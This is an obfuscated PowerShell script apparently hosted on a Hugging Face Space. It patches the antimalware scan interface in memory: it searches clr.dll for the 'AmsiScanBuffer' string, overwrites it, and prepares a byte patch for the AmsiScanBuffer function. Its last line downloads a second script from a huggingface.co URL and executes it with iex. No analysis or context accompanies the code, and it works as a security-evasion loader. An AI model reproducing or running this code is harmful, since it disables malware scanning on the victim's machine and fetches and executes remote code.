Spaces:
Runtime error
Runtime error
| Set-Location $env:TEMP | |
| ${Pa`Ge`_`REAdO`NlY} = 0x02 | |
| ${P`AGe`_rEA`DW`RItE} = 0x04 | |
| ${pAgE`_ExECu`Te`_ReADWrI`TE} = 0x40 | |
| ${pAgE`_EXeCUTE`_`REad} = 0x20 | |
| ${P`AG`e_GU`Ard} = 0x100 | |
| ${M`Em_`cOmm`iT} = 0x1000 | |
| ${MAx`_Path} = 260 | |
| function IsReadable { | |
| param (${prO`TecT}, ${S`TatE}) | |
| return (((${p`RotecT} -band ${PaGe_`R`E`A`dONLY}) -eq ${P`AGe_r`Ea`Don`LY} -or (${PrO`Te`cT} -band ${Pag`E_rEa`D`WRi`TE}) -eq ${pA`g`E_REAdwRi`Te} -or (${p`R`OtEct} -band ${PaGe`_ExecUTE_ReAD`w`RIte}) -eq ${pAgE_Exe`cutE_`Re`Ad`wrItE} -or (${P`ROt`ect} -band ${PagE_E`Xe`cu`TE_rE`AD}) -eq ${p`AGE_eX`e`CuTE_rEAd}) -and (${P`R`oTEcT} -band ${p`AGe`_`gUaRd}) -ne ${P`Age_`Gua`RD} -and (${ST`AtE} -band ${Mem_`cOMM`It}) -eq ${M`Em_Comm`IT}) | |
| } | |
| function PatternMatch { | |
| param (${b`Uf`FEr}, ${p`A`TtErn}, ${I`NDEX}) | |
| for (${I} = 0; ${i} -lt ${P`ATt`eRN}.Length; ${I}++) { | |
| if (${b`UffEr}[${IN`deX} + ${i}] -ne ${PatT`E`RN}[${I}]) { | |
| return ${f`Alse} | |
| } | |
| } | |
| return ${T`RUE} | |
| } | |
| ${dy`NAss`eMb`ly} = New-Object System.Reflection.AssemblyName("Win32") | |
| ${aSSEm`B`LYbU`i`LdEr} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${D`YNAS`seMB`Ly}, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| ${Mo`duL`eb`Ui`ldER} = ${a`SSEmBL`YB`UiLDER}.DefineDynamicModule("Win32", ${f`A`lSE}) | |
| ${Ty`P`ebuIl`DER} = ${ModU`Leb`UI`L`DeR}.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType]) | |
| [void]${tYP`EB`UiL`der}.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public) | |
| [void]${TY`pEBUIlD`er}.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public) | |
| [void]${Ty`pEBuI`LD`er}.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public) | |
| [void]${tYp`eBU`IlD`eR}.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public) | |
| [void]${TYpEBUI`l`dEr}.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public) | |
| [void]${T`Yp`EBui`LdER}.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public) | |
| [void]${TypEb`Ui`LD`er}.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public) | |
| ${meMO`RY_`INfo_`B`As`ic_st`RUCt} = ${ty`peBu`ild`eR}.CreateType() | |
| ${tYp`EbUIld`Er} = ${MOd`UlEb`UiLDEr}.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType]) | |
| [void]${tYp`eBu`i`LdEr}.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public) | |
| [void]${tYpeBu`iL`dER}.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public) | |
| [void]${typ`Eb`U`IldEr}.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public) | |
| [void]${T`Ype`BUi`LDeR}.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public) | |
| [void]${TYpEbu`il`d`eR}.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public) | |
| [void]${Ty`peBUi`LDer}.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public) | |
| [void]${t`YpEB`UilD`er}.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public) | |
| [void]${TYPE`BUi`LDeR}.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public) | |
| [void]${Ty`PEb`UIL`DeR}.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public) | |
| [void]${tY`Peb`UilDER}.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public) | |
| [void]${tyP`eB`UiLD`Er}.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public) | |
| ${s`yStEM`_`iNFo_s`T`RUcT} = ${tyPE`Bu`il`der}.CreateType() | |
| ${tYPEbUil`d`er} = ${M`oDU`l`EBuIldeR}.DefineType("Win32.Kernel32", "Public, Class") | |
| ${DlliM`p`ORTcoNsT`RUCT`or} = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) | |
| ${sETlasteR`R`or} = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError") | |
| ${S`ETLasterRorc`U`StOM`AttRi`ButE} = New-Object Reflection.Emit.CustomAttributeBuilder(${d`L`LimPO`RtcOn`stRu`CToR}, "kernel32.dll", [Reflection.FieldInfo[]]@(${seTLAS`Te`R`ROR}), @(${t`Rue})) | |
| ${p`INVokEmETH`Od} = ${TYPe`BUil`D`er}.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) | |
| ${pi`NVok`EmETHod}.SetCustomAttribute(${S`e`T`lA`StERROR`CUS`TO`maT`TrIBuTE}) | |
| ${piNvO`KEME`T`h`od} = ${t`Y`P`ebuilDEr}.DefinePInvokeMethod("GetCurrentProcess", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@(), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) | |
| ${piNVOke`M`E`THod}.SetCustomAttribute(${SetlAs`TE`RrOr`CuS`TOmAtTR`IbuTe}) | |
| ${P`In`VO`KEME`ThOd} = ${tY`PEbu`IL`DeR}.DefinePInvokeMethod("VirtualQuery", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [Win32.MEMORY_INFO_BASIC].MakeByRefType(), [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) | |
| ${p`InvOK`e`M`ethod}.SetCustomAttribute(${SeTLASTE`RRorC`U`sto`mA`TtRi`BUtE}) | |
| ${PI`N`Vo`kE`meThoD} = ${typeb`U`ild`Er}.DefinePInvokeMethod("GetSystemInfo", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [void], [Type[]]@([Win32.SYSTEM_INFO].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) | |
| ${pin`V`OkeMEthoD}.SetCustomAttribute(${Se`TLAS`TERroR`Cu`sTOMAttRIb`U`Te}) | |
| ${pI`NVo`KEM`EThoD} = ${tyP`Eb`Ui`LDeR}.DefinePInvokeMethod("GetMappedFileName", "psapi.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [System.Text.StringBuilder], [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) | |
| ${p`InVokE`MeT`hOD}.SetCustomAttribute(${seT`L`ASt`eRrorCUs`ToMa`TTrIbU`TE}) | |
| ${PINvO`Ke`Me`ThoD} = ${T`Y`pEbuIL`DeR}.DefinePInvokeMethod("ReadProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) | |
| ${p`INVOKE`MethOD}.SetCustomAttribute(${setL`AstE`R`RorcUst`Om`AtTr`ib`UtE}) | |
| ${PinV`oKeMeT`h`oD} = ${ty`PeBui`LD`Er}.DefinePInvokeMethod("WriteProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto) | |
| ${p`inVO`K`eMEThoD}.SetCustomAttribute(${set`la`sTeRROrc`UStO`M`AtTriBuTE}) | |
| ${KE`RNEl`32} = ${t`YpEbu`IldeR}.CreateType() | |
| ${a} = "Ams" | |
| ${B} = "iSc" | |
| ${C} = "anBuf" | |
| ${D} = "fer" | |
| ${SIg`NAt`URe} = [System.Text.Encoding]::UTF8.GetBytes(${a} + ${B} + ${c} + ${d}) | |
| ${hP`Roce`Ss} = [Win32.Kernel32]::GetCurrentProcess() | |
| ${sySI`N`Fo} = New-Object Win32.SYSTEM_INFO | |
| [void][Win32.Kernel32]::GetSystemInfo([ref]${s`YsiNFo}) | |
| ${memO`RyREg`Io`NS} = @() | |
| ${aD`dReSS} = [IntPtr]::Zero | |
| while (${Add`Re`sS}.ToInt64() -lt ${SyS`info}.lpMaximumApplicationAddress.ToInt64()) { | |
| ${meMI`N`FO} = New-Object Win32.MEMORY_INFO_BASIC | |
| if ([Win32.Kernel32]::VirtualQuery(${ad`d`ResS}, [ref]${M`emI`NFo}, [System.Runtime.InteropServices.Marshal]::SizeOf(${MEmiN`FO}))) { | |
| ${memoR`Yr`egI`o`Ns} += ${ME`m`iNFo} | |
| } | |
| ${ADDrE`SS} = New-Object IntPtr(${M`em`InFo}.BaseAddress.ToInt64() + ${m`EmiN`Fo}.RegionSize.ToInt64()) | |
| } | |
| ${c`o`UnT} = 0 | |
| $InitialDate=Get-Date; | |
| foreach (${Re`gI`on} in ${ME`M`oRy`R`eGiOns}) { | |
| if (-not (IsReadable ${reGI`ON}.Protect ${rEGi`ON}.State)) { | |
| continue | |
| } | |
| ${PaTh`BU`il`DER} = New-Object System.Text.StringBuilder ${m`Ax_p`ATH} | |
| if ([Win32.Kernel32]::GetMappedFileName(${hPROC`e`ss}, ${r`EgIOn}.BaseAddress, ${pa`Thbu`IlD`eR}, ${MA`X`_PaTh}) -gt 0) { | |
| ${Pa`TH} = ${PaThBu`ILd`ER}.ToString() | |
| if (${Pa`TH}.EndsWith("clr.dll", [StringComparison]::InvariantCultureIgnoreCase)) { | |
| ${Bu`F`FEr} = New-Object byte[] ${R`EGI`on}.RegionSize.ToInt64() | |
| ${bYTesR`E`Ad} = 0 | |
| [void][Win32.Kernel32]::ReadProcessMemory(${h`pr`OCeSs}, ${reg`i`on}.BaseAddress, ${B`UFf`ER}, ${BUf`F`er}.Length, [ref]${Byte`sRE`AD}) | |
| for (${K} = 0; ${K} -lt (${b`y`TESread} - ${S`IG`NATUre}.Length); ${K}++) { | |
| ${F`oUnD} = ${T`RUE} | |
| for (${m} = 0; ${m} -lt ${S`i`gnAturE}.Length; ${m}++) { | |
| if (${BU`F`FEr}[${k} + ${M}] -ne ${SI`GNa`TURE}[${M}]) { | |
| ${FO`Und} = ${f`Al`Se} | |
| break | |
| } | |
| } | |
| if (${FOu`ND}) { | |
| ${o`lDpRo`TECT} = 0 | |
| if ((${re`gi`on}.Protect -band ${Pa`g`e_`ReADWR`ite}) -ne ${pagE`_R`ea`dw`RITE}) { | |
| [void][Win32.Kernel32]::VirtualProtect(${rEg`IOn}.BaseAddress, ${Buff`er}.Length, ${p`A`Ge_eX`E`CU`TE_rEADwr`ITe}, [ref]${OL`dP`RO`TEct}) | |
| } | |
| ${R`epL`ACEME`Nt} = New-Object byte[] ${SI`G`NAturE}.Length | |
| ${b`YtESwR`ITteN} = 0 | |
| [void][Win32.Kernel32]::WriteProcessMemory(${hPr`oc`Ess}, [IntPtr]::Add(${reg`iON}.BaseAddress, ${K}), ${REplAc`emE`NT}, ${ReP`Lac`E`mENt}.Length, [ref]${By`T`eswR`i`TTEn}) | |
| ${cO`UnT}++ | |
| if ((${regi`ON}.Protect -band ${PAGE_`READWR`i`Te}) -ne ${paGE_`REaD`wriTE}) { | |
| [void][Win32.Kernel32]::VirtualProtect(${r`egion}.BaseAddress, ${bu`F`FeR}.Length, ${rE`GION}.Protect, [ref]${OL`D`p`RotECt}) | |
| } | |
| } | |
| } | |
| } | |
| } | |
| } | |
| Add-Type @" | |
| using System;using System.Runtime.InteropServices;public class Win32{[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr h,string p);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string n);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr a,UIntPtr s,uint p,out uint o);} | |
| "@ | |
| ${c`ou`NT} | |
| $LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll") | |
| $Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer") | |
| $p = 0 | |
| [Win32]::VirtualProtect($Address, [uint32]6, 0x40, [ref]$p) | |
| $Patch = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3) | |
| $FinishDate=Get-Date; | |
| $TimeElapsed = ($FinishDate - $InitialDate).TotalSeconds; | |
| Start-Sleep -Seconds ([math]::Round($TimeElapsed)) | |
| (New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/Add-Type5.ps1')|iex |